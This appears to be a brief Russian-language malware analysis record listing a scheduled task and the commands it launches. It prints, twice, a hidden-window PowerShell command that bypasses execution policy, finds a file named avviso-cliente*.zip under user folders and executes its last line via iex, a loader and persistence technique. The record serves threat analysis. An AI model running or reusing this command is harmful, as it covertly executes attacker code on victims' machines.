Техническая информация
- <SYSTEM32>\tasks\ai
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -eP byPaSs -nOP -win 1 -c &{cd C:\Users\;$d1=dir -force -r -in avviso-cliente*.zip|select -last 1;$h4=cat -LiteralPat $d1.fullname;$h4[$h4.length-1]|iex}' (со скрытым окном)
- '<SYSTEM32>\taskeng.exe' {76FC4531-4422-43D5-BDC0-C0BB8EEC5F95} S-1-5-21-1960123792-2022915161-3775307078-1001:pclbujio\user:Interactive:[1]
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -eP byPaSs -nOP -win 1 -c &{cd C:\Users\;$d1=dir -force -r -in avviso-cliente*.zip|select -last 1;$h4=cat -LiteralPat $d1.fullname;$h4[$h4.length-1]|iex}